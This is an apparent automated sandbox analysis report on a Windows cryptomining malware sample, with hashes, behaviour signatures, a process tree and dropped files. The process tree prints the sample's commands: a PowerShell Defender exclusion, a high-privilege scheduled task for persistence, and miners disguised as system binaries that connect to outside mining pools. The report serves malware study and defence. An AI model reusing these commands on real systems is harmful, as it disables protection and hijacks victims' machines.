Analysis

  • max time kernel
    302s
  • max time network
    307s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    19-09-2022 10:31

General

  • Target

    cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe

  • Size

    862KB

  • MD5

    a69b4b080114c6c20c5471ad5613e3bf

  • SHA1

    e2bff2d6b4e3742e5f88b54285abe2286742257a

  • SHA256

    cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c

  • SHA512

    c56960b4dd4f9a9ce114da597f2e3fca02d3a31df0599b2bde9e0eb61c7890e88c1573326616a307d711f54c3df959db7e2590805beee1a1174fe60f8fe94137

  • SSDEEP

    6144:7lwUrVjuSJHQ7ngOzI53XvrxC8e7IDnUc5D8pDF8Z5+ECLsrski+xk30+TeE0Hu0:LVRQgDzxCUFM55sXi/00f70us

Score
8/10
upx

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 1 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe
    "C:\Users\Admin\AppData\Local\Temp\cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1700
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2012
    • C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp56E.tmp.bat""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2020
      • C:\Windows\system32\timeout.exe
        timeout 3
        3⤵
        • Delays execution with timeout.exe
        PID:1532
      • C:\ProgramData\ccl\DHUZT.exe
        "C:\ProgramData\ccl\DHUZT.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:892
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1372
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1916
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"
            5⤵
            • Creates scheduled task(s)
            PID:1600
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RGvbrbsSuWBAhQiVVqYY73R6VMCC1AwQYi.NewWorker -p x -t 7
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:724
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c cls
            5⤵
              PID:1756
          • C:\Windows\explorer.exe
            C:\Windows\explorer.exe --user t1fd8D4s9ZYr87E5HaqJJehhTWq5G4A5X2z.APOCALYPSE --port 2001 --pool us-flux.fluxpools.net --pass x --coin flux
            4⤵
              PID:1380
      • C:\Windows\system32\taskeng.exe
        taskeng.exe {8F03AC33-66BD-407E-B19D-DBC5D2CE6D0D} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:1260
        • C:\ProgramData\ccl\DHUZT.exe
          C:\ProgramData\ccl\DHUZT.exe
          2⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1524
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
            3⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1764
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1628
            • C:\Windows\system32\schtasks.exe
              schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"
              4⤵
              • Creates scheduled task(s)
              PID:1324
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RGvbrbsSuWBAhQiVVqYY73R6VMCC1AwQYi.NewWorker -p x -t 7
            3⤵
              PID:724
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c cls
                4⤵
                  PID:1808
              • C:\Windows\explorer.exe
                C:\Windows\explorer.exe --user t1fd8D4s9ZYr87E5HaqJJehhTWq5G4A5X2z.APOCALYPSE --port 2001 --pool us-flux.fluxpools.net --pass x --coin flux
                3⤵
                  PID:1864

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\ProgramData\ccl\ChromeApp.dat

              Filesize

              5.5MB

              MD5

              615fa272b82e4fd059683972258e3f46

              SHA1

              6f897ce43f3683f363b5b57361a1f1961e98c265

              SHA256

              0de21ad041e22932f1bc59b14ee2f1d2323b7de6ae38e7525cd4fec462250154

              SHA512

              0301cace98c25dcb066134f3cf7ff56f3b8b4ce2ffcb887c8789938e6b4c20510b81e12d707d4d03e2d56a6befab5bc5adea184a2532c9bd97d6921e90c15060

            • C:\ProgramData\ccl\DHUZT.exe

              Filesize

              862KB

              MD5

              a69b4b080114c6c20c5471ad5613e3bf

              SHA1

              e2bff2d6b4e3742e5f88b54285abe2286742257a

              SHA256

              cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c

              SHA512

              c56960b4dd4f9a9ce114da597f2e3fca02d3a31df0599b2bde9e0eb61c7890e88c1573326616a307d711f54c3df959db7e2590805beee1a1174fe60f8fe94137

            • C:\ProgramData\ccl\DHUZT.exe

              Filesize

              862KB

              MD5

              a69b4b080114c6c20c5471ad5613e3bf

              SHA1

              e2bff2d6b4e3742e5f88b54285abe2286742257a

              SHA256

              cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c

              SHA512

              c56960b4dd4f9a9ce114da597f2e3fca02d3a31df0599b2bde9e0eb61c7890e88c1573326616a307d711f54c3df959db7e2590805beee1a1174fe60f8fe94137

            • C:\ProgramData\ccl\DHUZT.exe

              Filesize

              862KB

              MD5

              a69b4b080114c6c20c5471ad5613e3bf

              SHA1

              e2bff2d6b4e3742e5f88b54285abe2286742257a

              SHA256

              cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c

              SHA512

              c56960b4dd4f9a9ce114da597f2e3fca02d3a31df0599b2bde9e0eb61c7890e88c1573326616a307d711f54c3df959db7e2590805beee1a1174fe60f8fe94137

            • C:\ProgramData\ccl\chromium.dat

              Filesize

              654KB

              MD5

              a5b3b8fa07fdff608c76d4d2463e1793

              SHA1

              8ac85a5afecace98377a2e33ab8c046e01ed74db

              SHA256

              a4748fb90784b7606071bd242fe97a86b091e049018bb162c4c7b0fd591f5492

              SHA512

              b96654f1df3ffec423b4bb699544958d0dd1bd2a30e70e04bf1f0bb7bbf1dd5e25dd0cee9d65ea35f0cffdb77a489ba5356f9156e2a77328fa7e8480d6ef0302

            • C:\Users\Admin\AppData\Local\Temp\tmp56E.tmp.bat

              Filesize

              136B

              MD5

              2e88e9972deecde25a973a02eb03f594

              SHA1

              2cfd6ac2ed2703ebc65f3daca73664c4357e0ee5

              SHA256

              bf18cbd556a8e1700fe154468628931dead4d6f60d4917f0581bce338c868dc2

              SHA512

              cc004bf8977ab5ad9214db0f8477e66bed181d1e1a607a6b6c10fbec122b224b269500fef7c85c5849bc325810a98181ea9a7fdcfea4d8a32c3ac4728ff42855

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

              Filesize

              7KB

              MD5

              d161f271719f4be4f463594af3f2a139

              SHA1

              748ce6dff0b051ec6448a8fd3e527c1db85aa172

              SHA256

              ae3aa380bf6da244ba087b3292774a11fea7d1c539839dc0c02af86ad01c1c3d

              SHA512

              d631b038dc7b90d74a686a727abac2b66fabcdf458e3fc981b1c6de861c48c080a7974892ce814782a1869a05fceb9bcd60ed74d5308603a1a1ff664d3b6ea4b

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

              Filesize

              7KB

              MD5

              d161f271719f4be4f463594af3f2a139

              SHA1

              748ce6dff0b051ec6448a8fd3e527c1db85aa172

              SHA256

              ae3aa380bf6da244ba087b3292774a11fea7d1c539839dc0c02af86ad01c1c3d

              SHA512

              d631b038dc7b90d74a686a727abac2b66fabcdf458e3fc981b1c6de861c48c080a7974892ce814782a1869a05fceb9bcd60ed74d5308603a1a1ff664d3b6ea4b

            • \ProgramData\ccl\DHUZT.exe

              Filesize

              862KB

              MD5

              a69b4b080114c6c20c5471ad5613e3bf

              SHA1

              e2bff2d6b4e3742e5f88b54285abe2286742257a

              SHA256

              cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c

              SHA512

              c56960b4dd4f9a9ce114da597f2e3fca02d3a31df0599b2bde9e0eb61c7890e88c1573326616a307d711f54c3df959db7e2590805beee1a1174fe60f8fe94137

            • memory/724-98-0x0000000140000000-0x00000001400C6000-memory.dmp

              Filesize

              792KB

            • memory/724-104-0x0000000140000000-0x00000001400C6000-memory.dmp

              Filesize

              792KB

            • memory/724-92-0x0000000140000000-0x00000001400C6000-memory.dmp

              Filesize

              792KB

            • memory/724-96-0x0000000140000000-0x00000001400C6000-memory.dmp

              Filesize

              792KB

            • memory/724-144-0x0000000140000000-0x00000001400C6000-memory.dmp

              Filesize

              792KB

            • memory/724-99-0x0000000140000000-0x00000001400C6000-memory.dmp

              Filesize

              792KB

            • memory/724-84-0x0000000140000000-0x00000001400C6000-memory.dmp

              Filesize

              792KB

            • memory/724-85-0x0000000140000000-0x00000001400C6000-memory.dmp

              Filesize

              792KB

            • memory/724-102-0x0000000140000000-0x00000001400C6000-memory.dmp

              Filesize

              792KB

            • memory/724-95-0x0000000140000000-0x00000001400C6000-memory.dmp

              Filesize

              792KB

            • memory/724-94-0x0000000140000000-0x00000001400C6000-memory.dmp

              Filesize

              792KB

            • memory/724-93-0x0000000140000000-0x00000001400C6000-memory.dmp

              Filesize

              792KB

            • memory/724-90-0x0000000140000000-0x00000001400C6000-memory.dmp

              Filesize

              792KB

            • memory/724-89-0x0000000140000000-0x00000001400C6000-memory.dmp

              Filesize

              792KB

            • memory/724-87-0x0000000140000000-0x00000001400C6000-memory.dmp

              Filesize

              792KB

            • memory/724-146-0x0000000140000000-0x00000001400C6000-memory.dmp

              Filesize

              792KB

            • memory/892-70-0x0000000001050000-0x000000000112C000-memory.dmp

              Filesize

              880KB

            • memory/1372-82-0x0000000002524000-0x0000000002527000-memory.dmp

              Filesize

              12KB

            • memory/1372-81-0x000000000252B000-0x000000000254A000-memory.dmp

              Filesize

              124KB

            • memory/1372-80-0x000000001B740000-0x000000001BA3F000-memory.dmp

              Filesize

              3.0MB

            • memory/1372-78-0x000007FEEC880000-0x000007FEED3DD000-memory.dmp

              Filesize

              11.4MB

            • memory/1372-79-0x0000000002524000-0x0000000002527000-memory.dmp

              Filesize

              12KB

            • memory/1372-77-0x000007FEED3E0000-0x000007FEEDE03000-memory.dmp

              Filesize

              10.1MB

            • memory/1372-83-0x000000000252B000-0x000000000254A000-memory.dmp

              Filesize

              124KB

            • memory/1380-109-0x0000000140000000-0x0000000142EFE000-memory.dmp

              Filesize

              47.0MB

            • memory/1380-111-0x0000000140000000-0x0000000142EFE000-memory.dmp

              Filesize

              47.0MB

            • memory/1380-108-0x0000000140000000-0x0000000142EFE000-memory.dmp

              Filesize

              47.0MB

            • memory/1380-106-0x0000000140000000-0x0000000142EFE000-memory.dmp

              Filesize

              47.0MB

            • memory/1380-105-0x0000000140000000-0x0000000142EFE000-memory.dmp

              Filesize

              47.0MB

            • memory/1700-54-0x0000000000B90000-0x0000000000C6C000-memory.dmp

              Filesize

              880KB

            • memory/1764-124-0x000000000260B000-0x000000000262A000-memory.dmp

              Filesize

              124KB

            • memory/1764-123-0x0000000002604000-0x0000000002607000-memory.dmp

              Filesize

              12KB

            • memory/1764-120-0x000007FEECAB0000-0x000007FEED4D3000-memory.dmp

              Filesize

              10.1MB

            • memory/1764-121-0x000007FEEBF50000-0x000007FEECAAD000-memory.dmp

              Filesize

              11.4MB

            • memory/2012-62-0x0000000002714000-0x0000000002717000-memory.dmp

              Filesize

              12KB

            • memory/2012-61-0x000007FEF3720000-0x000007FEF427D000-memory.dmp

              Filesize

              11.4MB

            • memory/2012-60-0x000007FEF4280000-0x000007FEF4CA3000-memory.dmp

              Filesize

              10.1MB

            • memory/2012-63-0x000000001B710000-0x000000001BA0F000-memory.dmp

              Filesize

              3.0MB

            • memory/2012-64-0x0000000002714000-0x0000000002717000-memory.dmp

              Filesize

              12KB

            • memory/2012-56-0x000007FEFC611000-0x000007FEFC613000-memory.dmp

              Filesize

              8KB

            • memory/2012-65-0x000000000271B000-0x000000000273A000-memory.dmp

              Filesize

              124KB